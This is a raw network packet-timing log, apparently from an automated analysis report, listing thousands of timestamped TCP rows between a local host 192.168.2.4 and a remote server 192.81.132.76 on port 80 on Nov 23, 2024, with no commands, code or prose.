                                                                                                                                                          Nov 23, 2024 12:47:16.706592083 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.706744909 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.706840992 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.707674026 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.707803965 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.707859039 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.708822966 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.708859921 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.708914995 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.709609032 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.709707022 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.709759951 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.710619926 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.710731983 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.710794926 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.711612940 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.711721897 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.711774111 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.712610006 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.712723970 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.712786913 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.713613033 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.713718891 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.713773012 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.714629889 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.714721918 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.714776039 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.715614080 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.715708017 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.715769053 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.716593981 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.716710091 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.716759920 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.717582941 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.717719078 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.717770100 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.718609095 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.718713999 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.718769073 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.719582081 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.719692945 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.719752073 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.720603943 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.720679045 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.720731974 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.721597910 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.721709967 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.721757889 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.722593069 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.722727060 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.722784042 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.723586082 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.723706961 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.723762989 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.724519968 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.766468048 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.883052111 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.883107901 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.883209944 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.883271933 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.883352041 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.883470058 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.884254932 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.884413004 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.884557962 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.885246038 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.885302067 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.885373116 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.886307001 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.886487961 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.886643887 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.887245893 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.887387037 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.887564898 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.888267040 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.888402939 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.888608932 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.889233112 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.889367104 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.890249968 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.890383959 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.890407085 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.890635967 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.891273022 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.891395092 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.891765118 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.892235041 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.892375946 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.892462969 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.893280983 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.893335104 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.893403053 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.894253969 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.894376040 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.894541979 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.895232916 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.895370960 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.895538092 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.896243095 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.896343946 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.896491051 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.897234917 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.897360086 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.897605896 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.898261070 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.898394108 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.898588896 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.899590969 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.899820089 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.900017023 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.900262117 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.900298119 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.900419950 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.901230097 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.901355982 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.901426077 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.902220964 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.902368069 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.902513027 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.903333902 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.903373957 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.903450966 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.904228926 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.904339075 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.904422998 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.905230999 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.905335903 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.905586958 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.906227112 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.906330109 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.906476021 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.907218933 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.907347918 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.907524109 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.908233881 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.908350945 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.908742905 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.909224033 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.909321070 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.909420013 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.910221100 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.910321951 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.910428047 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.911238909 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.911358118 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.911475897 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.912229061 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.912313938 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.912394047 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.913223028 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.913376093 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.913436890 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.914215088 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.914333105 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.914599895 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.915232897 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.915393114 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.915554047 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.916299105 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.916354895 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.916449070 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.917210102 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.917330027 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.917432070 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.918215990 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.918349981 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.918447971 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.919220924 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.919353962 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.919504881 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.920378923 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.920413971 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.921204090 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.921331882 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.921334028 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.921452045 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.922224045 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.922362089 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.923207998 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.923288107 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.923336983 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.923438072 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.924282074 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.924352884 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.924455881 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.925215006 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.925313950 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.925369024 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.926222086 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.926331997 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.926517010 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.927220106 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.927257061 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.927370071 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.928219080 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.928323030 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.929193974 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.929290056 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.929316998 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.929415941 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.930213928 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.930316925 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.930576086 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.931201935 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.931330919 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.931464911 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.932188988 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.932301044 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.932426929 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.933187962 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.933300972 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.933439970 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.934190989 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.934310913 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.934391975 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.935156107 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.985227108 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.080240011 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.080307961 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.080346107 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.080399990 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.080432892 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.080466986 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.080499887 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.080533981 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.080566883 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.080604076 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.087141037 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.093234062 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.093359947 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.093534946 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.093655109 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.093888044 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.093945980 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.094000101 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.094878912 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.094999075 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.095257998 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.095871925 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.096021891 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.096039057 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.096885920 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.097007990 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.097014904 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.097923994 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.097980022 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.098020077 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.098845959 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.098928928 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.098982096 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.099857092 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.099914074 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.100157976 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.100852013 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.100967884 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.101095915 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.101866961 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.101984024 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.102025032 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.102865934 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.102982044 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.103079081 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.103859901 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.103982925 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.104176044 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.104928017 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.105025053 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.105062008 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.105875015 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.105976105 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.105993986 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.106873989 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.106962919 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.107001066 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.107889891 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.108025074 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.108059883 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.108882904 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.108994007 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.109034061 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.109858036 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.109975100 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.110013962 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.110862970 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.110985994 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.111218929 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.111850977 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.111975908 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.112014055 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.112870932 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.112976074 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.113013983 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.113866091 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.113939047 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.114025116 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.114855051 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.114959002 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.114996910 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.115858078 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.115993977 CET8049734192.81.132.76192.168.2.4
